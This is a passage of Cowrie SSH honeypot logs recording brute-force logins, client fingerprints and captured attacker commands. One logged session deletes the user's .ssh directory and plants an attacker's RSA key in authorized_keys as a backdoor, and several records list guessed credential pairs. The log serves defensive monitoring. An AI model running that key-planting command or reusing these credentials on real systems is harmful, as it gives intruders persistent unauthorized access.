{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:22:28.707793Z","src_ip":"212.227.235.229","session":"a4065225b9b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33824,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2406ec7735f","protocol":"ssh","message":"New connection: 212.227.235.229:33824 (1.2.3.4:22) [session: c2406ec7735f]","sensor":"my-vps","timestamp":"2025-08-31T05:22:29.707430Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:22:29.709277Z","src_ip":"212.227.235.229","session":"c2406ec7735f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:22:29.716338Z","src_ip":"212.227.235.229","session":"a4065225b9b4"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:22:29.984734Z","src_ip":"212.227.235.229","session":"c2406ec7735f"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:22:30.979054Z","src_ip":"212.227.235.229","session":"a4065225b9b4"}
{"eventid":"cowrie.login.success","username":"root","password":"Abc12345.","message":"login attempt [root/Abc12345.] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:22:31.128837Z","src_ip":"212.227.235.229","session":"c2406ec7735f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53360,"dst_ip":"1.2.3.4","dst_port":22,"session":"d9b1975a1c62","protocol":"ssh","message":"New connection: 212.227.235.229:53360 (1.2.3.4:22) [session: d9b1975a1c62]","sensor":"my-vps","timestamp":"2025-08-31T05:22:31.225138Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:22:31.228319Z","src_ip":"212.227.235.229","session":"d9b1975a1c62"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:22:31.477522Z","src_ip":"212.227.235.229","session":"d9b1975a1c62"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:22:31.695609Z","src_ip":"212.227.235.229","session":"c2406ec7735f"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:22:31.696443Z","src_ip":"212.227.235.229","session":"c2406ec7735f"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:22:31.697762Z","src_ip":"212.227.235.229","session":"c2406ec7735f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:22:31.975278Z","src_ip":"212.227.235.229","session":"c2406ec7735f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:22:32.482527Z","src_ip":"212.227.235.229","session":"d9b1975a1c62"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:22:32.989487Z","src_ip":"212.227.235.229","session":"c2406ec7735f"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:22:32.990149Z","src_ip":"212.227.235.229","session":"c2406ec7735f"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:22:32.993517Z","src_ip":"212.227.235.229","session":"7222fb6c018e"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:22:32.994440Z","src_ip":"212.227.235.229","session":"d9b1975a1c62"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:22:33.268486Z","src_ip":"212.227.235.229","session":"c2406ec7735f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:22:33.269354Z","src_ip":"212.227.235.229","session":"c2406ec7735f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35470,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a03f9c96b7c","protocol":"ssh","message":"New connection: 212.227.235.229:35470 (1.2.3.4:22) [session: 0a03f9c96b7c]","sensor":"my-vps","timestamp":"2025-08-31T05:22:33.540274Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:22:33.541127Z","src_ip":"212.227.235.229","session":"0a03f9c96b7c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:22:33.813563Z","src_ip":"212.227.235.229","session":"0a03f9c96b7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40952,"dst_ip":"1.2.3.4","dst_port":22,"session":"929bd5c2bafc","protocol":"ssh","message":"New connection: 212.227.125.160:40952 (1.2.3.4:22) [session: 929bd5c2bafc]","sensor":"my-vps","timestamp":"2025-08-31T05:22:33.820583Z"}
{"eventid":"cowrie.session.closed","duration":"36.1","message":"Connection lost after 36.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:22:34.085916Z","src_ip":"212.227.125.160","session":"201c8d615d00"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:22:34.455716Z","src_ip":"212.227.125.160","session":"929bd5c2bafc"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:22:34.456810Z","src_ip":"212.227.125.160","session":"929bd5c2bafc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:22:34.944172Z","src_ip":"212.227.235.229","session":"0a03f9c96b7c"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:22:36.218396Z","src_ip":"212.227.235.229","session":"0a03f9c96b7c"}
{"eventid":"cowrie.login.failed","username":"test","password":"password","message":"login attempt [test/password] failed","sensor":"my-vps","timestamp":"2025-08-31T05:22:36.320654Z","src_ip":"212.227.125.160","session":"929bd5c2bafc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36486,"dst_ip":"1.2.3.4","dst_port":22,"session":"879e2549d67a","protocol":"ssh","message":"New connection: 212.227.235.229:36486 (1.2.3.4:22) [session: 879e2549d67a]","sensor":"my-vps","timestamp":"2025-08-31T05:22:36.489502Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:22:36.490156Z","src_ip":"212.227.235.229","session":"879e2549d67a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:22:36.762156Z","src_ip":"212.227.235.229","session":"879e2549d67a"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:22:37.705622Z","src_ip":"212.227.125.160","session":"929bd5c2bafc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:22:37.890146Z","src_ip":"212.227.235.229","session":"879e2549d67a"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:22:38.163473Z","src_ip":"212.227.235.229","session":"c2406ec7735f"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:22:38.164275Z","src_ip":"212.227.235.229","session":"879e2549d67a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37276,"dst_ip":"1.2.3.4","dst_port":22,"session":"265f9c9b7131","protocol":"ssh","message":"New connection: 212.227.235.229:37276 (1.2.3.4:22) [session: 265f9c9b7131]","sensor":"my-vps","timestamp":"2025-08-31T05:22:53.020016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:22:53.020992Z","src_ip":"212.227.235.229","session":"265f9c9b7131"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:22:53.112447Z","src_ip":"212.227.235.229","session":"265f9c9b7131"}
{"eventid":"cowrie.login.failed","username":"admin","password":"root@123","message":"login attempt [admin/root@123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:22:53.521296Z","src_ip":"212.227.235.229","session":"265f9c9b7131"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:22:54.615944Z","src_ip":"212.227.235.229","session":"265f9c9b7131"}
{"eventid":"cowrie.login.failed","username":"gitlab-runner","password":"gitlab-runner","message":"login attempt [gitlab-runner/gitlab-runner] failed","sensor":"my-vps","timestamp":"2025-08-31T05:22:56.521225Z","src_ip":"212.227.235.229","session":"397fab664c0f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51662,"dst_ip":"1.2.3.4","dst_port":22,"session":"f663772f2d5f","protocol":"ssh","message":"New connection: 212.227.235.229:51662 (1.2.3.4:22) [session: f663772f2d5f]","sensor":"my-vps","timestamp":"2025-08-31T05:22:58.145654Z"}
{"eventid":"cowrie.session.closed","duration":"94.7","message":"Connection lost after 94.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:06.545611Z","src_ip":"212.227.235.229","session":"397fab664c0f"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:23:06.915284Z","src_ip":"212.227.235.229","session":"f663772f2d5f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:23:06.916106Z","src_ip":"212.227.235.229","session":"f663772f2d5f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60136,"dst_ip":"1.2.3.4","dst_port":22,"session":"a1a6b6131959","protocol":"ssh","message":"New connection: 212.227.125.160:60136 (1.2.3.4:22) [session: a1a6b6131959]","sensor":"my-vps","timestamp":"2025-08-31T05:23:07.408262Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:23:08.783733Z","src_ip":"212.227.125.160","session":"a1a6b6131959"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 